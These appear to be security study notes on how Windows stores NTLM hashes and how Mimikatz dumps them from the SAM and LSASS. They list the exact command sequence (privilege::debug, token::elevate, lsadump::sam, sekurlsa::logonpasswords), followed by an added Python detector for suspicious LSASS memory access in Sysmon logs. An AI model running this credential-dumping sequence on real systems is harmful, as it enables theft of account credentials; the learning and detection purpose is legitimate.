Understanding NTLM and Mimikatz:
- Windows stores hashed passwords in the Security Account Manager (SAM)
- Rainbow table attack = a precomputed table of hashes is compared against the captured hash (does not work against salted hashes)
- Mimikatz
- Because the kernel holds an exclusive lock on "C:\Windows\system32\config\sam", the file cannot be copied or moved. Mimikatz bypasses this.
- Using the "sekurlsa" module it can also extract hashes from the process memory of the Local Security Authority Subsystem (LSASS).
- LSASS is a process in Windows which handles and caches user authentication, password changes, and access token creation.
- It is run by the SYSTEM account, which is even more privileged than Administrator.
- Mimikatz needs to be run as at least Administrator and have "SeDebugPrivilege" enabled, which lets us debug our own and other users' processes.
- Elevation to SYSTEM can happen through PsExec, or through Mimikatz's token elevation function (which requires "SeImpersonatePrivilege", and that is on by default for admins).
Mimikatz Usage:
- Enumerate local users:
Get-LocalUser
- Start Mimikatz as at least Administrator:
.\mimikatz.exe
- Enable SeDebugPrivilege:
privilege::debug
- Elevate to SYSTEM:
token::elevate
- Run an arbitrary command. Examples:
lsadump::sam # Dumps NTLM hashes from the SAM.
sekurlsa::logonpasswords # Dumps all logon credentials it can find (from LSASS).
- Win!
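Added defensive example (not part of the original notes): the steps above leave a trace a defender can look for, namely a process outside the usual set opening lsass.exe with memory-read rights, which is what sekurlsa::logonpasswords needs. The Python below runs that check over constructed Sysmon Event ID 10 (ProcessAccess) records; the field names SourceImage, TargetImage and GrantedAccess are Sysmon's, while the sample events, paths and allowlist are made up for illustration.

```python
# Added example (not from the original notes): flag Mimikatz-style LSASS reads
# in Sysmon Event ID 10 (ProcessAccess) records. Records are constructed here
# as dicts using Sysmon's field names; real ones come from the event log.

PROCESS_VM_READ = 0x0010  # access right needed to read another process's memory

# Hypothetical per-host allowlist of processes that legitimately open lsass.exe.
DEFAULT_ALLOWLIST = {
    r"C:\Windows\System32\csrss.exe",
    r"C:\Windows\System32\wininit.exe",
    r"C:\Windows\System32\svchost.exe",
}

# Constructed sample events (Sysmon Event ID 10 fields, values made up).
SAMPLE_EVENTS = [
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\svchost.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1000"},
    {"EventID": 10, "SourceImage": r"C:\Users\alice\Downloads\mimikatz.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1010"},
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\taskmgr.exe",
     "TargetImage": r"C:\Windows\System32\notepad.exe", "GrantedAccess": "0x1410"},
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\csrss.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1fffff"},
]


def is_lsass(image: str) -> bool:
    return image.lower().endswith("\\lsass.exe")


def suspicious_lsass_access(events, allowlist=DEFAULT_ALLOWLIST):
    """Return (SourceImage, GrantedAccess) for each ProcessAccess event where a
    process outside the allowlist opened lsass.exe with PROCESS_VM_READ set."""
    allowed = {a.lower() for a in allowlist}
    hits = []
    for ev in events:
        if ev.get("EventID") != 10 or not is_lsass(ev.get("TargetImage", "")):
            continue
        granted = int(ev["GrantedAccess"], 16)
        if granted & PROCESS_VM_READ == 0:
            continue  # query-only handle, no memory read
        if ev["SourceImage"].lower() in allowed:
            continue
        hits.append((ev["SourceImage"], hex(granted)))
    return hits


if __name__ == "__main__":
    for src, access in suspicious_lsass_access(SAMPLE_EVENTS):
        print(f"ALERT: {src} opened lsass.exe with GrantedAccess={access}")
```

The allowlist has to be tuned per host, since EDR agents and some backup tools also read LSASS memory.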